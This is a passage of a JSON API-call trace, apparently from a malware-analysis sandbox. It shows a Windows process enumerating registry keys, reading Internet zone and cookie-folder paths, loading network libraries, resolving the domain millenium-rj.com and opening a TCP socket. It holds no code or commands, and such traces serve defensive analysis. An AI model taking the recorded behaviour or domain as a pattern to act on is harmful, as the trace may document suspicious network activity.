"11036", "caller": "0x76537ab1", "parentcaller": "0x764f201a", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "Index", "value": "0" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 838 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537ab1", "parentcaller": "0x764f201a", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "Index", "value": "1" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 839 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537ab1", "parentcaller": "0x764f201a", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "Index", "value": "2" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 840 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537ab1", "parentcaller": "0x764f201a", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "Index", "value": "3" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 841 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537ab1", "parentcaller": "0x764f201a", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "Index", "value": "4" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 842 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537ab1", "parentcaller": "0x764f201a", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "Index", "value": "5" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 843 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537ab1", "parentcaller": "0x764f201a", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "Index", "value": "6" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 844 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537ab1", "parentcaller": "0x764f201a", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "Index", "value": "7" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 845 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000444" } ], "repeated": 0, "id": 846 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 847 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" } ], "repeated": 0, "id": 848 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "ValueName", "value": "1A10" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1A10" } ], "repeated": 0, "id": 849 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000444" } ], "repeated": 0, "id": 850 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 851 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00746000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 852 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00747000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 853 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764de9e9", "parentcaller": "0x72d9616f", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\ESE\\" } ], "repeated": 0, "id": 854 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7717e41c", "parentcaller": "0x7717e3a8", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x001e1000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 855 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764fc39b", "parentcaller": "0x72d80501", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000444" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047b0000" }, { "name": "SectionOffset", "value": "0x043cf828" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 856 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x72daf243", "parentcaller": "0x72dccab8", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 21, "id": 857 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e1c36", "parentcaller": "0x76ffab4f", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\mswsock.dll" }, { "name": "BaseAddress", "value": "0x71a30000" } ], "repeated": 1, "id": 858 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e1c36", "parentcaller": "0x76ff5580", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\DNSAPI" }, { "name": "DllBase", "value": "0x73780000" } ], "repeated": 0, "id": 859 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0074b000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 860 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764df044", "parentcaller": "0x76ff92fe", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000478" } ], "repeated": 0, "id": 861 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e18b6", "parentcaller": "0x76ff9325", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 862 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x76ff9339", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000478" } ], "repeated": 0, "id": 863 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 864 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000478" }, { "name": "DesiredAccess", "value": "0x000f003f", "pretty_value": "KEY_ALL_ACCESS" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "System\\CurrentControlSet\\Services\\WinSock2\\Parameters" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters" } ], "repeated": 0, "id": 865 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x7653696a", "parentcaller": "0x764f3154", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000478" }, { "name": "ValueName", "value": "WinSock_Registry_Version" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\WinSock_Registry_Version" } ], "repeated": 0, "id": 866 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x7653696a", "parentcaller": "0x764f32c1", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000478" }, { "name": "ValueName", "value": "WinSock_Registry_Version" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "2.0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\WinSock_Registry_Version" } ], "repeated": 0, "id": 867 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x7653696a", "parentcaller": "0x764f3154", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000478" }, { "name": "ValueName", "value": "AutodialDLL" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "C:\\Windows\\System32\\rasadhlp.dll" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\AutodialDLL" } ], "repeated": 1, "id": 868 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764f46db", "parentcaller": "0x76ff6193", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000478" } ], "repeated": 0, "id": 869 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e1c36", "parentcaller": "0x764dd966", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\rasadhlp" }, { "name": "DllBase", "value": "0x73940000" } ], "repeated": 0, "id": 870 }, { "timestamp": "2025-02-27 23:34:22,644", "thread_id": "11160", "caller": "0x764e1c36", "parentcaller": "0x764dd966", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\rasadhlp.dll" }, { "name": "BaseAddress", "value": "0x73940000" } ], "repeated": 0, "id": 871 }, { "timestamp": "2025-02-27 23:34:22,644", "thread_id": "11160", "caller": "0x764f956a", "parentcaller": "0x76fffb5d", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "rasadhlp.dll" }, { "name": "ModuleHandle", "value": "0x73940000" }, { "name": "FunctionName", "value": "WSAttemptAutodialAddr" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x739425a0" } ], "repeated": 0, "id": 872 }, { "timestamp": "2025-02-27 23:34:22,644", "thread_id": "11160", "caller": "0x764f956a", "parentcaller": "0x76fffb73", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "rasadhlp.dll" }, { "name": "ModuleHandle", "value": "0x73940000" }, { "name": "FunctionName", "value": "WSAttemptAutodialName" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73941570" } ], "repeated": 0, "id": 873 }, { "timestamp": "2025-02-27 23:34:22,644", "thread_id": "11160", "caller": "0x764f956a", "parentcaller": "0x76fffb89", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "rasadhlp.dll" }, { "name": "ModuleHandle", "value": "0x73940000" }, { "name": "FunctionName", "value": "WSNoteSuccessfulHostentLookup" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73942670" } ], "repeated": 0, "id": 874 }, { "timestamp": "2025-02-27 23:34:22,644", "thread_id": "11160", "caller": "0x739416b1", "parentcaller": "0x7700148c", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000003", "pretty_value": "FILE_READ_ACCESS|FILE_WRITE_ACCESS" }, { "name": "FileName", "value": "\\Device\\RasAcd" }, { "name": "CreateDisposition", "value": "3", "pretty_value": "FILE_OPEN_IF" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000080", "pretty_value": "FILE_ATTRIBUTE_NORMAL" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 875 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e1c36", "parentcaller": "0x76ffb489", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\fwpuclnt" }, { "name": "DllBase", "value": "0x73720000" } ], "repeated": 0, "id": 876 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e1c36", "parentcaller": "0x76ffb489", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\FWPUCLNT.DLL" }, { "name": "BaseAddress", "value": "0x73720000" } ], "repeated": 0, "id": 877 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e1c36", "parentcaller": "0x76ffb489", "category": "network", "api": "GetAddrInfoExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Name", "value": "millenium-rj.com" }, { "name": "ServiceName", "value": "" } ], "repeated": 0, "id": 878 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x72d8dcf0", "parentcaller": "0x72d8df74", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 879 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000450", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1104" } ], "repeated": 0, "id": 880 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 881 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000308" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 882 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00751000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 883 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 884 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000308" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 885 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x7719566b", "parentcaller": "0x764e1f4e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\mswsock.dll" } ], "repeated": 0, "id": 886 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771a2450", "parentcaller": "0x77188ea8", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000484" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" } ], "repeated": 0, "id": 887 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x7725b8de", "parentcaller": "0x771ea78a", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000484" }, { "name": "ValueName", "value": "Latest" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest" } ], "repeated": 0, "id": 888 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771ea7e5", "parentcaller": "0x77188ea8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000484" } ], "repeated": 0, "id": 889 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x7718940b", "parentcaller": "0x77189837", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000484" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe\\Windows\\System32\\es-ES\\mswsock.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 890 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x77189881", "parentcaller": "0x7718939e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000048c" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000484" } ], "repeated": 0, "id": 891 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771898a9", "parentcaller": "0x7718939e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000048c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047d0000" }, { "name": "SectionOffset", "value": "0x043cd7e0" }, { "name": "ViewSize", "value": "0x00007000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 892 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771898b9", "parentcaller": "0x7718939e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 893 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x7719566b", "parentcaller": "0x764e1f4e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\mswsock.dll" } ], "repeated": 4, "id": 894 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x7719566b", "parentcaller": "0x764e1f4e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\wshqos.dll" } ], "repeated": 0, "id": 895 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e09db", "parentcaller": "0x764e04de", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wshqos.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 896 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e1ffa", "parentcaller": "0x764e1ca7", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000490" }, { "name": "DesiredAccess", "value": "0x00000005", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x0000048c" } ], "repeated": 0, "id": 897 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e2043", "parentcaller": "0x764e1ca7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x00000490" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047e0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00007000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 898 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e209b", "parentcaller": "0x764e1ca7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" } ], "repeated": 0, "id": 899 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e20a2", "parentcaller": "0x764e1ca7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 900 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771a2450", "parentcaller": "0x77188ea8", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000048c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" } ], "repeated": 0, "id": 901 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x7725b8de", "parentcaller": "0x771ea78a", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000048c" }, { "name": "ValueName", "value": "Latest" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest" } ], "repeated": 0, "id": 902 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771ea7e5", "parentcaller": "0x77188ea8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 903 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x7718940b", "parentcaller": "0x77189837", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe\\Windows\\System32\\es-ES\\wshqos.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 904 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x77189881", 